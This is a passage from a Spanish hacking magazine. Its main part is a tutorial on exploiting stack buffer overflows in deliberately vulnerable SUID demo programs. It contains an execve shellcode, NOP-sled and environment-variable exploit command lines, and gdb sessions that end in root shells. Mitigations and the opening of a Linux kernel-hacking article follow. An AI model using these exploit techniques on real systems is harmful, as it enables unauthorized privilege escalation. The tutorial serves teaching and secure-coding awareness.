El comando perl -e 'print cat bof.c' lo que hace es impri mir por pantalla la cadena cat bof.c. Al meter dicho co mando entre acentos graves, la bash lo que hace es ejecu tar el comando, y tomar la salida como una orden a ejecu tar. Por tanto, en este caso la shell lo que ha ejecutado es

NOTA
Para quien no lo sepa, un depurador es un programa que nos ayuda a seguir la ejecucin de nuestros programas paso por paso, pudiendo detener dicha ejecucin en un punto determinado, examinar la memoria del programa, cambiar el contenido de dicha memoria en tiempos de ejecucin, y evidentemente, continuar con su ejecucin despus de haberlo parado.

47/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

GDB es el depurador de GNU, disponible para GNU/Linux y para otros sistemas operativos, y viene incorporado en la mayora de distribuciones de GNU/Linux actuales. Se lanza mediante la orden gdb ejecutable, y luego queda a la espera de comandos. Aqu os dejo una pequea referencia de comandos: run [lista_argumentos] : Nos permite ejecutar el programa con la lista de argumentos que hemos especificado. list : Muestra el cdigo del programa, siempre que se h aya c o m p i l a d o c o n o p c i o n e s d e d e p u ra c i n . p [EXPR] : Imprime en pantalla el resultado de la expresin EXPR. Lo usaremos para ver la direccin de una determinada variable o un registro en memoria. x [EXPR] : Este comando sirve para examinar el contenido de una determinada direccin de memoria. Se puede acompaar de cdigos de formato, por ejemplo, x/s &mensaje imprimir el contenido de la variable mensaje (si existe) como una cadena. break [archivo:linea] : Detendr la ejecucin del programa en la lnea especificada del archivo especificado. Es opcional la especificacin del archivo. Nosotros no la usaremos puesto que los programas de ejemplo solo usan un archivo de cdigo. continue : Nos permite continuar con la ejecucin del programa despus de detenerlo. next: Sirve para ejecutar una sola instruccin despus de detener el programa. quit : Evidentemente, para salir del gdb. Si queris ms informacin sobre gdb, podis consultar la pgina del manual (man gdb) o bien la informacin que proporciona el comando info, mucho ms extensa (info gdb).
This GDB was configured as "i386-linux"...Using host libthread_db li brary "/lib/tls/libthread_db.so.1". (gdb) break 11 Breakpoint 1 at 0x80483fe: file bof.c, line 11. (gdb) run `perl -e 'print "A"x524'` Starting program: /home/tuxed/Articulos HxC/bof `perl -e 'print "A"x524'` Breakpoint 1, main (argc=2, argv=0xbffffb54) at bof.c:11 11 strcpy(mensaje,argv[1]); (gdb) x $ebp+4 0xbffffacc: 0x400357f8 (gdb) next 12 printf("%s\n",mensaje); (gdb) x $ebp+4 0xbffffacc: 0x40035700 (gdb) quit The program is running. Exit anyway? (y or n) y Como vemos, se ha modificado el valor del registro eip, pero no con lo que esperbamos, que era 0x41414141, si no modificando su ltimo byte por 00. Esto es porque el final de una cadena se representa con un byte nulo (0x00), y debido a que en la arquitectura x86 se guardan los bytes de menor peso delante (little endian), se ha mo dificado el ltimo byte de la direccin de retorno con un 00. As pues, para modificar nuestra direccin de retorno correctamente, necesitaremos al menos 528 bytes. En este momento, ya sabemos qu pasa en la pila y con cuntos caracteres logramos modificar la direccin de re torno de nuestro programa. Ahora debemos saber cmo hacer que nuestro programa haga exactamente lo que no sotros queramos, es decir, como hacerle ejecutar nuestra shellcode. Para hacer esto, existen varias posibilidades. La ms usada es guardar la shellcode en el propio buffer y lo grar modificar la direccin de retorno con la direccin del propio buffer.

Puesto que la direccin del buffer puede variar debido a variables de entorno, nombre del programa, etc., lo que haremos ser rellenar el principio del buffer con unas cuantas instrucciones NOP (No Operation, byte 0x90), que lo que hacen es, precisamente, no hacer nada. As, tendre mos un margen ms grande a la hora de acertar con la direccin de retorno. Despus de los NOPs, ponemos la shellcode y, despus, ponemos la direccin del buffer repe tidamente hasta lograr los 528 bytes que necesitamos para modificar la direccin de retorno (por si acaso, vamos a poner unos pocos ms). As, nuestro buffer quedar como sigue:

Bien, pues vamos a poner un breakpoint (punto de ruptu ra) justo antes de rellenar el buffer (lnea 11), y mirare mos la direccin de retorno. Acto seguido, ejecutaremos la siguiente instruccin y veremos si se ha modificado di cho valor: tuxed@athenea:~/Articulos HxC$ gdb bof GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for de tails.

48/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

Pero, cuntos NOPs ponemos? Cuantas direcciones de re torno? Pues bien, vamos a pensarlo. Primero tenemos que saber que shellcode vamos a usar. Yo voy a usar la si guiente shellcode: "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\ x54\x53\x50\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x 52\x53\x89\xe1\xcd\x80" As pues, la metemos en un archivo, y contamos sus ca racteres: tuxed@athenea:~/Articulos HxC$ printf "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54 \x53\x50\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x 53\x89\xe1\xcd\x80">scode tuxed@athenea:~/Articulos HxC$ wc -c scode 38 scode tuxed@athenea:~/Articulos HxC$ Bien, si tenemos 38 bytes para la shellcode, entonces nos quedan, suponiendo que vamos a usar 540 bytes, 502 pa ra NOPs y direcciones de retorno. Teniendo en cuenta que las direcciones de retorno son de 4 bytes, vamos a usar para NOPs 234 bytes, y el resto, 502-234=268 para direc ciones de retorno. Dividimos 268 entre 4, y vemos que te nemos que poner 67 veces la direccin de retorno. Ahora bien, todava no sabemos la direccin de retorno, as que tenemos que averiguarla, pero cmo? Pues, como antes, con la ayuda del depurador gdb: (gdb) break 11 Breakpoint 1 at 0x80483fe: file bof.c, line 11. (gdb) run `perl -e 'print "A"x540'` Starting program: /home/tuxed/Articulos HxC/bof `perl -e 'print "A"x540'` Breakpoint 1, main (argc=2, argv=0xbffffb44) at bof.c:11 11 strcpy(mensaje,argv[1]); (gdb) p &mensaje $1 = (char (*)[512]) 0xbffff8b0 (gdb) quit The program is running. Exit anyway? (y or n) y Como vemos, nuestro buffer est en 0xbffff8b0. Como te nemos un margen de 241 bytes, vamos a saltar aproxima damente al centro del bloque de NOPs, esto es, unos 100 bytes ms hacia delante del inicio del buffer. As pues, si sumamos 100 (decimal) a dicha direccin, nos queda 0xbffff914. As pues, tenemos el siguiente esquema: flow, el programa vctima debe ser ejecutado por un usua rio con ms privilegios que nosotros en el sistema (root por ejemplo ), o bien tener el bit SUID activado y ser propiedad de dicho usuario. Como inciso, decir que cuando un ejecutable tiene el bit SUID activo, ser ejecutado siempre con los permisos de su propietario. Es decir, si tenemos un programa de root con el bit SUID activo, al ejecutarlo tendremos los privile gios de root. Si dicho programa tiene un buffer overflow, entonces el cdigo que ejecutemos (la shellcode) se ejecu tar con privilegios de root. Por tanto, vamos a dar privile gios de root a nuestro programa, cambiando el propietario a root y activando el bit suid: tuxed@athenea:~/Articulos HxC$ su Password: athenea:/home/tuxed/Articulos HxC# chown root bof athenea:/home/tuxed/Articulos HxC# chmod u+s bof Ahora procedemos a explotar nuestro programita, tal como he indicado antes: tuxed@athenea:~/Articulos HxC$ ./bof `perl -e 'print "\x90"x234'``cat scode``perl -e 'print "\xbf\xff\xf9\x14"x67'` ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc ccccccccccccccccccccccccccccc c1Ph//shh/binPTSP!t#;

RSc############ ############### ############### ############### ########## Violacin de segmento tuxed@athenea:~/Articulos HxC$ Mmm Qu ha pasado? Como vemos arriba, ha habido una violacin de segmento y nos devuelve a nuestra propia shell. Por qu? Algunos de vosotros, si habis estado atentos a lo que he escrito al principio, ya sabris la razn. Si recordis, dije que la codificacin de los datos en la ar quitectura Intel x86 es little endian, lo que significa que en memoria, los bytes de menor peso se guardan primero. As pues, nuestra direccin de retorno habr sido guardada en orden inverso, y por eso se ha producido la violacin de segmento. Vamos a verlo: tuxed@athenea:~/Articulos HxC$ gdb bof GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc.

Pues bien, vamos a hacerlo. Para ello utilizaremos otra vez perl, pero esta vez para imprimir 234 bytes con el valor 0x90. Justo despus de sto, usaremos el comando cat con el archivo que contiene nuestro shellcode (es decir, cat scode), y luego la direccin de retorno 67 veces. Si hace mos esto, y todo va bien, deberamos tener nuestra ansia da shell. Para sacar provecho de verdad de un buffer over

49/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditio ns. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for de tails. This GDB was configured as "i386-linux"...Using host libthread_db li brary "/lib/tls/libthread_db.so.1". (gdb) break 12 Breakpoint 1 at 0x8048418: file bof.c, line 12. (gdb) run `perl -e 'print "\x90"x234'``cat scode``perl -e 'print "\xbf\xff\xf9\x14"x67'` Starting program: /home/tuxed/Articulos HxC/bof `perl -e 'print "\x90"x234'``cat scode``perl -e 'print "\xbf\xff\xf9\x14"x67'` Breakpoint 1, main (argc=351928255, argv=0x14f9ffbf) at bof.c:12 12 printf("%s\n",mensaje); (gdb) x $ebp+4 0xbffffabc: 0x14f9ffbf (gdb) quit The program is running. Exit anyway? (y or n) y tuxed@athenea:~/Articulos HxC$ Como veis, la direccin de retorno que habamos supuesto ha salido completamente al revs. As pues, para resolver el problema, lo que deberemos hacer es darle la vuelta a la direccin de retorno, para que los bytes queden como queremos. Por tanto, vamos a ejecutar nuestro ataque fi nal y obtener nuestra ansiada shell: tuxed@athenea:~/Articulos HxC$ ./bof `perl -e 'print "\x90"x234'``cat scode``perl -e 'print "\x14\xf9\xff\xbf"x67'` ccccccccccccccccccccccccc1Ph//shh /binPTSP!t#; RSc############# ############### ############### ############## ########## sh-3.00# whoami root sh-3.00# Como ves, la violacin de segmento desaparece, y aparece una bonita shell de root Bien, como ya os dije antes, con 528 bytes en este caso bastaba para modificar la direccin de retorno. Si lo queris comprobar, no tenis ms que disminuir el nmero de NOPs o de direcciones de retorno. Si pones 12 bytes menos, el desbordamiento se guir ocurriendo (540-12=528), y seguiremos obteniendo shell. Por tanto, podis usar hasta 12 NOPs menos, o bien hasta 3 direcciones de retorno menos, y seguiris obte niendo la shell de root. Por otra parte, debo comentaros tambin que puede darse el caso de que las direcciones de memoria que introduci mos en nuestro buffer no estn correctamente alineadas con la memoria de la pila, y en tal caso no conseguiramos nuestro objetivo, pues la direccin de retorno sera, por ejemplo 0xf914ffbf, y arrojara una violacin de segmento. En tal caso, la solucin pasa por poner o quitar NOPs hasta que la memoria quede bien alineada y se ejecute nuestra shell. En el ejemplo de la direccin 0xf914ffbf, deberamos aadir o quitar dos NOPs, para que se alinearan correcta mente. Si el desplazamiento fuese de tres bytes hacia la izquierda (0x14bffff9), deberamos quitar un NOP o bien aadir tres. Evidentemente, no podremos quitar NOPs si hemos afinado al mximo el tamao de nuestro buffer, as que solo nos quedar aadir alguno Tambin comentaros que si se trata de un programa en un ordenador remoto, os servir igualmente esta tcnica, pe ro deberis usar una shellcode que os permita obtener la shell, ya sea conectando a un puerto de la mquina vcti ma, o bien que sea la propia shellcode la que se conecte a vosotros.

Bien, ahora ya sabemos cmo explotar un buffer overflow utilizando el propio buffer para almacenar nuestra shellco de, pero pensemos un momento, Qu pasara si nuestro buffer vulnerable no tuviese suficiente espacio para alber gar el cdigo de la shellcode? Mediante la tcnica expuesta en las pginas anteriores no podramos explotar el fallo de seguridad que contiene el programa, pero tranquilos, no est todo perdido, todava tenemos alguna posibilidad Imaginemos el siguiente programa: Cdigo bof2.c #include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char texto[10]; int num; if(argc>1){ strcpy(texto, argv[1]); num=strlen(texto); printf("Tu texto contiene %d caracteres\n",num); return 0; } return -1; } Esta vez el programa vuelve a ser una chorrada, simple mente cuenta el nmero de caracteres que contiene la pa labra/frase pasada como primer argumento, y muestra un texto informativo por pantalla. Como vemos, vuelve a usar la funcin strcpy, sin tener en cuenta el tamao del buffer, as que podremos desbordarlo. Sin embargo, este progra ma no tiene un buffer tan grande como el anterior, sino que tiene apenas 10 caracteres, y por tanto dentro no pa rece que nos quepa nuestra shellcode. Vamos a probar otra vez el nmero de caracteres que necesitamos para desbordar con la tcnica vista antes, y veremos que no ca be todo lo que metamos en el buffer anteriormente:

50/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

tuxed@athenea:~/Articulos HxC$ ./bof2 `perl -e 'print "A"x20'` Tu texto contiene 20 caracteres tuxed@athenea:~/Articulos HxC$ ./bof2 `perl -e 'print "A"x28'` Tu texto contiene 28 caracteres Instruccin ilegal tuxed@athenea:~/Articulos HxC$ ./bof2 `perl -e 'print "A"x27'` Tu texto contiene 27 caracteres Ahora vemos que nos basta con 28 caracteres para provo car un comportamiento errneo del programa. Sin embar go, con el programa anterior vimos que con los 524 carac teres que nos bastaban para sto, no modificbamos la direccin de retorno completamente, as que ahora necesi taremos al menos 32 caracteres, como podemos compro bar con el gdb: tuxed@athenea:~/Articulos HxC$ gdb bof2 (gdb) list 1 #include <stdio.h> 2 #include <string.h> 3 4 int main(int argc, char *argv[]){ 5 char texto[10]; 6 int num; 7 if(argc>1){ 8 strcpy(texto, argv[1]); 9 num=strlen(texto); 10 printf("Tu texto contiene %d caracteres\n",num); (gdb) break 10 Breakpoint 1 at 0x804842f: file bof2.c, line 10. (gdb) run `perl -e 'print "A"x32'` Starting program: /home/tuxed/Articulos HxC/bof2 `perl -e 'print "A"x32'` Breakpoint 1, main (argc=0, argv=0xbffff9a4) at bof2.c:10 10 printf("Tu texto contiene %d caracteres\n",num); (gdb) x $ebp+4 0xbffff91c: 0x41414141 (gdb) 0xbffff920: 0x00000000 (gdb) no tener variables de entorno maliciosas). Dichas variables son almacenadas en la pila de cada proceso, as que desde nuestro programa podremos acceder a ellas, y podremos forzar, mediante el buffer overflow, a que nuestro progra ma salte al cdigo albergado por una de estas variables de entorno. Antes de empezar con esta tcnica, vamos a crear una de estas variables de entorno y tratar de localizarla en la pila mediante el gdb: tuxed@athenea:~/Articulos HxC$ export HOLA="Hola HxC" tuxed@athenea:~/Articulos HxC$ gdb bof2 (gdb) break 10 Breakpoint 1 at 0x804842f: file bof2.c, line 10. (gdb) run hola Starting program: /home/tuxed/Articulos HxC/bof2 hola Breakpoint 1, main (argc=2, argv=0xbffff9b4) at bof2.c:10 10 printf("Tu texto contiene %d caracteres\n",num); (gdb) x/24s $esp Ahora empezaremos a ver algunos smbolos raros, varias cadenas... Todo eso son los datos que estn en la pila en este momento. Dando a INTRO podemos avanzar por la pi la, para ir examinando todo su contenido. Tras hacerlo va rias veces, llegaremos a una zona con algo similar a esto: 0xbfffff0a: 0xbfffff28: 0xbfffff35: 0xbfffff3e: 0xbfffff46: 0xbfffff57: 0xbfffff78: 0xbfffff86: 0xbfffff93: 0xbfffffa1: 0xbfffffc4: 0xbfffffdd: "PWD=/home/tuxed/Articulos HxC" "LANG=spanish" "LINES=38" "SHLVL=3" "HOME=/home/tuxed" "GNOME_DESKTOP_SESSION_ID=Default" "LOGNAME=tuxed" "DISPLAY=:0.0" "HOLA=Hola HxC" "XAUTHORITY=/home/tuxed/.Xauthority" "COLORTERM=gnome-terminal" "/home/tuxed/Articulos HxC/bof2"

Vemos que se ha modificado con A's la direccin de retor no entera, pero la memoria que le sigue no, as que este es el lmite de caracteres que tenemos en este caso. Como vemos, en este buffer no nos cabe nuestra shellcode, puesto que tenemos 28 bytes de espacio (los 32 que lle gan a sobrescribir la direccin de retorno, menos los 4 bytes que ocupa la propia direccin de retorno). Obviamente, no nos queda otra opcin que buscarnos un lugar alternativo donde meter nuestro cdigo mquina (shellcode). Como ya habris adivinado, el lugar alternativo donde va mos a guardar las instrucciones binarias que conforman nuestra shellcode son las variables de entrono. Estas va riables, no son ms que unas variables asignadas por el usuario y que son comunes a todos los procesos del usua rio (a no ser que stos se encarguen de eliminarlas para

Aqu tenemos las variables de entorno de nuestro progra ma, y lo ltimo que vemos es el nombre del propio progra ma. Como veis, todo eso est en la pila, y nada nos impide usarlo para nuestros fines Adems, el gdb es tan bueno que nos brinda la direccin de la propia variable, as que no tenemos que buscar mucho ms. Sin embargo, es un poco coazo estar lanzando el gdb y buscando la variable cada vez que queramos averiguarlo, as que vamos a ha cernos un programita en C que nos lo haga: Cdigo env.c : #include <stdio.h> int main(int argc, char *argv[]){ char *var; if(argc>1){ var=getenv(argv[1]); 51/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

printf("La variable %s est en la direccin %p \n", argv[1], var); return 0; } return -1; } C o n l a ay u d a d e e s t e p r o g ra m a , va m o s a l o g ra r l a direccin de la variable HOLA: tuxed@athenea:~/Articulos HxC$ ./env HOLA La variable HOLA est en la direccin 0xbfffff9c tuxed@athenea:~/Articulos HxC$ Anda! Antes era 0xbfffff93! La direccin de la variable cambia dependiendo del programa! Pues vamos a ver por qu pasa sto. Probemos a cambiar el nombre del progra ma env, aadindole una, dos y tres letras, a ver como va ra la direccin que nos devuelve: tuxed@athenea:~/Articulos HxC$ mv env envi && ./envi HOLA La variable HOLA est en la direccin 0xbfffff9a tuxed@athenea:~/Articulos HxC$ mv envi envir && ./envir HOLA La variable HOLA est en la direccin 0xbfffff98 tuxed@athenea:~/Articulos HxC$ mv envir enviro && ./enviro HOLA La variable HOLA est en la direccin 0xbfffff96 tuxed@athenea:~/Articulos HxC$ Pues s, la direccin cambia dependiendo del nombre del programa. Como se puede ver con los comandos anterio res, la direccin de la variable disminuye de 2 en 2 con ca da carcter que aumenta el nombre del programa. Ahora estamos en disposicin de obtener la direccin exacta de la variable en nuestro programa vulnerable mediante este programa, bien cambiando el nombre del programa para que tenga la misma longitud que el del programa atacado, bien con un poquito de aritmtica entonces debemos escribir 8 veces la direccin de memo ria (en realidad podramos poner 28 caracteres cualesquie ra y luego la direccin de memoria, pues lo nico que nos interesa es sobrescribir los ltimos 4 bytes, que son los que realmente se usarn como direccin de retorno). Recordad tambin, que la direccin de retorno debe escri birse en formato little-endian pues sino no funcionar. As pues, queda esto: tuxed@athenea:~/Articulos HxC$ export SCODE=`cat scode` tuxed@athenea:~/Articulos HxC$ ./envi SCODE La variable SCODE est en la direccin 0xbffffaf0 tuxed@athenea:~/Articulos HxC$ ./bof2 `perl -e 'print "\xf0\xfa\xff\xbf"x8'` Tu texto contiene 32 caracteres sh-3.00# whoami root sh-3.00# Bien! Ya somos root!! Siguiendo estas dos tcnicas, de beramos ser capaces de explotar cualquier programa vul nerable a buffer overflow que encontremos, para conseguir una shell (sea de root o de otro usuario) en un sistema re moto, o conseguir una elevacin de privilegios en un siste ma donde ya tenemos nuestro propio usuario.

Vamos pues a poner nuestra shellcode en una variable de entorno, y tratar de ejecutarla mediante el buffer overflow: tuxed@athenea:~/Articulos HxC$ export SCODE=`cat scode` tuxed@athenea:~/Articulos HxC$ cp enviro envi tuxed@athenea:~/Articulos HxC$ ./envi SCODE La variable SCODE est en la direccin 0xbffffaf0 tuxed@athenea:~/Articulos HxC$ Bueno, ahora que ya tenemos la direccin, tan slo nos queda rellenar el buffer de forma que la direccin de retor no sobrescrita sea la de nuestra variable, para luego gozar de esa shell que nos brinda. Antes debemos hacer 'real mente vulnerable' nuestro programita, dndole privilegios de root, tal como he explicado antes: athenea:/home/tuxed/Articulos HxC# chown root bof2;chmod u+s bof2; athenea:/home/tuxed/Articulos HxC# exit Ahora, recuerda, tenemos un buffer que rellenar con 32 bytes. Si cada direccin de memoria ocupa cuatro bytes, 52/68

Para acabar, os comentar algunas posibles formas de so lucionar este tipo de errores. Cuando estamos programan do, siempre que usemos una cadena de caracteres, debe mos tener mucho cuidado con los desbordamientos. Cada vez que realicemos una copia de cadenas, cada vez que leamos una cadena proporcionada por el usuario, debemos tener en cuenta la limitacin del tamao del buffer, o bien usar variables dinmicas. Como soluciones, existen li breras de cadenas seguras, como por ejemplo SafeStr(http://www.zork.org/safestr/ ), o bien el uso de funciones 'seguras', como strncpy o similares. Existen va rios manuales de programacin segura en la red, as como libros en formato impreso que hablan sobre ello, como por ejemplo Secure Programming Cookbook for C and C++ de O'Reilly( http://www.secureprogramming.com ). A parte de las soluciones en cuanto a programacin, pode mos proteger nuestro sistema con distintos parches de se guridad para el kernel. Algunos ejemplos de ellos son Gr S e c u r i t y ( h t t p : / / w w w . g r s e c u r i t y. n e t ) o P a X (http://pax.grsecurity.net/ ) . As se puede conseguir pilas no ejecutables, lo que no nos permitira guardar nuestro cdigo en ella, pues luego no podramos ejecutarlo, o tam bin que las variables cada vez tengan unas direcciones de memoria distintas, con lo que no podramos acertar la direccin de nuestro buffer para lograr que la ejecucin de nuestro programa cayera en la shellcode. En el primer caso, el de las pilas no ejecutables (nonexecutable stack), existen mtodos de ataque conocidos, que se basan en saltar hacia libreras del sistema, que es

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

tn en memoria para todos los procesos, conocidas como return-into-libc. Para el caso en el que las direcciones de las variables son completamente distintas en cada ejecucin del programa, yo no conozco ninguna forma de hacerlo mediante el uso de shellcodes (aunque puede que la haya), pero tambin podemos usar return-into-libc, aun que tambin puede que haya protecciones que hagan im posible el uso de esta tcnica. Por mi parte, eso es todo respecto al tema de la explotacin de un buffer overflow en la pila, pero no me despedir sin antes deciros que no dudis en pasaros por el foro para preguntar cualquier duda que tengis respecto a este artculo o a lo que sea, que estaremos encantados de ayudaros, tanto yo como cualquiera de los dems compaeros usuarios del foro. Por otra parte, tambin tengo que comentaros que es po sible que un da de estos se encuentre alguna sorpresita en el foro con respecto a este tema, alguna ampliacin del artculo, o alguna explicacin un poco ms detallada de las cosas que creamos que no hayan quedado demasiado cla ras, as que te animo a pasarte por all y pegar una mira dita. Adems, para cuando leas estas lneas, tendrs los cdigos de ejemplo en el foro, as que si quieres probar to do lo que he dicho, ya sabes Bibliografa Hacking: The art of Exploitation. (Jon Erickson, Editorial No Starch Press) Phrack #49 14 : Smashing The Stack For Fun and Profit (AlephOne)

QUIERES COLABORAR CON PC PASO A PASO?

PC PASO A PASO busca personas que posean conocimientos de informtica y deseen publicar sus trabajos. SABEMOS que muchas personas (quizs tu eres una de ellas) han creado textos y cursos para consumo propio o de unos pocos. SABEMOS que muchas personas tienen inquietudes periodsticas pero nunca se han atrevido a presentar sus trabajos a una editorial. SABEMOS que hay verdaderas obras de arte creadas por personas como tu o yo y que nunca vern la luz. PC PASO A PASO desea contactar contigo!

NOSOTROS PODEMOS PUBLICAR TU OBRA!!!

S I D E S E A S M S I N F O R M AC I N , e nv a n o s u n m a i l a empleo@editotrans.com y te responderemos concretando nuestra oferta.

53/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

En las entraas del pingino En 1991 alguien llamado Linus B. Torvalds se compra un PC (386) para intentar comprender de forma exhaustiva su funcionamiento. Como es de imaginar, el Sistema Operativo de Microsoft cutre de la poca (conocido como DOS) no aprovechaba el procesador 386 (ni siquiera usaba el modo protegido). As que Linus cogi otro sistema llamado "Minix" con A. Tanembaum como principal desarrollador y empez a implemen tar y reprogramar funcionalidades hasta el punto en el que en 1991 ya disponamos de la versin de 0.01 de Linux (contraccin Linus + Unix), que estaba muy lejos de ser lo que hoy es el potente sistema operativo LINUX. La primera versin oficial (la 0.02) data del 5 de Octubre de 1991 y ya permita ejecutar ciertos programas 'GNU' como 'bash'. Gracias a Internet y el esfuerzo de la comunidad sobre Marzo de 1994 estaba disponible la primera versin "estable" 1.0 de nuestro querido sistema operativo de forma totalmente independiente y libre Por supuesto desde esa versin 1.0 hasta la actual serie 2.6.x han cambiado muchsimas cosas... pero una nunca lo hace, siempre tenemos el cdigo fuente y el control total de lo que pueda hacer o no hacer el kernel o ncleo de nuestro sistema. En este artculo vamos a dar un interesante paseo por el corazn de nuestro pingino favorito pasando por los kernels 2.0, 2.2, 2.4 hasta llegar a la actual serie 2.6.x (en el momento de escribir estas lneas) con el propsito de comprender algunas cosas de su funcionamiento que nos sirvan para destripar literalmente el ncleo, alguien puede desconfiar ahora de nuestras "dudosas intenciones"... y no sin motivo porque vamos a hackear literalmente el kernel de Linux Empecemos

54/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

Para buscar e instalar el paquete .deb que contiene el

NOTA
No te atreves a instalar LINUX en tu PC porque temes incompatibilidades con tu Windows? No quieres arriesgate? Esta editorial ha sacado al mercado una nueva revista llamada PC SUPERMANUALES. En su nmero 2, que estar disponible en todos los kioscos en la primera semana de Marzo del 2005, se tratar el tema de las mquinas virtuales. Podrs instalar todos los Sistemas Operativos que quieras sin miedo ninguno a "estropear" tu Windows

cdigo fuente de la versin del Kernel que se pretende instalar, por otro lado los usuarios de Mandrake, SuSe o distribuciones basadas en RPM pueden ejecutar en su sistema: rpm -i "kernel-2.6.9.rpm" para instalar ese paquete concreto. En cualquier caso lo que importa es que al final - y una vez ms dependiendo del sabor de Linux que utilices tendremos en el directorio /usr/src otra nueva entrada que contiene el cdigo fuente, en el ejemplo: /usr/src/linux-2.6.9 o algo similar as mismo es altamente recomendable - por no decir necesario - disponer de un enlace simblico en

Bien, para lo que vamos a ir viendo que es, entre otras cosas, el kernel de Linux, necesitaremos algo fundamental... un Kernel Puedes estar pensando <<Pero si estoy en Linux ahora... acaso no tengo ya un kernel?>> pues s, pero lo que necesitamos son LAS FUENTES del Kernel y no un ncleo en ejecucin (aunque tambin evidentemente), es decir, que necesitars tener Linux instalado en tu sistema y los "sources". En la URL www.kernel.org

"/usr/src/linux" apuntando a las fuentes actuales del Kernel que est funcionando, desde all podemos crear ese enlace mediante la orden 'ln -s' tal que as: ln -s /usr/src/linux-`uname -r` linux O tambin ln s /usr/src/linux-$(uname r) linux Una vez hecho esto podemos echar un vistazo al directorio que contiene las fuentes del ncleo "ls /usr/src/linux" y observar que el cdigo sigue una organizacin muy concreta donde por ejemplo: "fs" contiene los sistemas de archivos "init" es el main() de Linux "kernel" contiene las principales llamadas al sistema "lib" diversos mdulos "arch" el cdigo dependiente de la arquitectura, son algunos de los directorios que aparecen. Otras cosas que debes tener instaladas en tu sistema son el compilador "GCC" y opcionalmente el debugger "GDB" junto con todas aquellas cosas que sean requeridas o puedan venirte bien para el desarrollo. Ser estrictamente necesario disponer del cdigo fuente del Kernel (2.4.x y 2.6.x) y de gcc para poder compilar los programas que

Puedes bajarte un tarball con el cdigo fuente pero por lo general y dependiendo de tu sabor de Linux dispones de paquetes o de alguna manera de obtener el cdigo directamente desde un CD-ROM o a travs de Internet, por ejemplo, los usuarios de Debian pueden ejecutar en su sistema: apt-cache search kernel y apt-get install kernel-2.6.9

iremos viendo. En cualquier caso - y antes de continuar - te recomiendo que hagas una copia segura de los datos de tu disco duro y que NO pruebes el cdigo que te presentar en ordenadores dedicados a la produccin y/o que contengan datos importantes... especialmente si son ajenos

55/68

HACKEANDO EL NCLEO - HACKEANDO EL NCLEO

//------------- compilacin y salida del listado 1 ---linux$ gcc -O3 listado1.c -o listado1 A estas alturas creo que habr quedado claro que vamos a programar... y que vamos a programar en C. El tema de ensamblador intentar evitarlo no obstante cualquier referencia a instrucciones de ese tipo se har de forma indirecta, por lo que no debes preocuparte por ese tema... eso no influir en la comprensin de lo que iremos viendo. Lo que si que sera de gran utilidad es tener cierto conocimiento del lenguaje C del que s depende en gran medida la comprensin del cdigo. Eso s, te ir explicando todo aquello que no entiendas y har hincapi en aquellas cosas de las que de forma irremediable puedan surgir dudas. Para aquellos que no tengan muy fresco eso de programar en C vamos a presentar el primer listado y as podrs recordar conceptos de puntero, direcciones de memoria y punteros a funciones. Como el cdigo es bastante explcito no har ningn comentario adicional. // ------------ listado 1 ---------------#include <stdio.h> #define A 34 #define B 40 /* puntero a una func. */ int (*ptr_f) (int, int); /* func. sumar dos enteros */ int f_test (int a, int b) { return (a + b);} int main (void) { int suma = 0; /* puntero a un int */ int *suma_ptr = NULL; printf ("f_test en:0x%x\n", f_test); printf ("ptr_f apunta a:0x%x\n", ptr_f); /* apuntamos a f_test(int,int) */ ptr_f = f_test; printf ("ptr_f apunta a @f_test()"); printf ("...ejecutando *ptr_f()!\n"); /* call @ptr_f -> f_test */ suma = (*ptr_f) (A, B); /* suma_ptr -> @suma */ suma_ptr = &suma; printf ("la variable 'suma' se encuentra en (@0x%x)\n", &suma); /* contenido de @suma_ptr ? */ printf ("...contiene el valor:%d\n", *suma_ptr); return 0; } //-------- final listado 1 ----------------------linux$./listado1 f_test en:0x80483c0 ptr_f apunta a:0x0 ptr_f apunta a @f_test()...ejecutando *ptr_f()! la variable 'suma' se encuentra en (@0xbffff2e4) ...contiene el valor:74 //------------- final salida listado 1 ----------------Parece que s

Como ya sabrs el ncleo del sistema operativo se encuentra en un modo privilegiado para operar con la mquina y sus dispositivos mientras que los usuarios trabajamos con direcciones de memoria virtuales y hacemos las peticiones al ncleo para que realice por nosotros aquellas cosas que no se nos est permitido hacer de forma directa. A la zona de memoria del ncleo se le llama simplemente espacio del kernel y a la del usuario espacio de usuario o "userland" simple no?. Si estando en el espacio del kernel cometemos algn fallo o saltamos a una direccin de memoria equivocada es ms que probable que el sistema se inestabilice o que surjan comportamientos no previstos que terminaran en un genuino "kernel panic" y un festival de volcados de memoria que te obligarn a reiniciar la mquina en el peor de los casos no tendrs tus discos sincronizados y tu mquina se reiniciar de inmediato por lo que se recomienda sincronizarlos (comando 'sync' desde la consola) con el fin de no perder aquellos datos no volcados an al disco y dems. Ni que decir tiene que la manera de trabajar en el espacio del kernel es algo distinta a como lo haramos en nuestros programas habituales dentro del espacio de usuario, pero de todas formas eso lo veremos en breve.

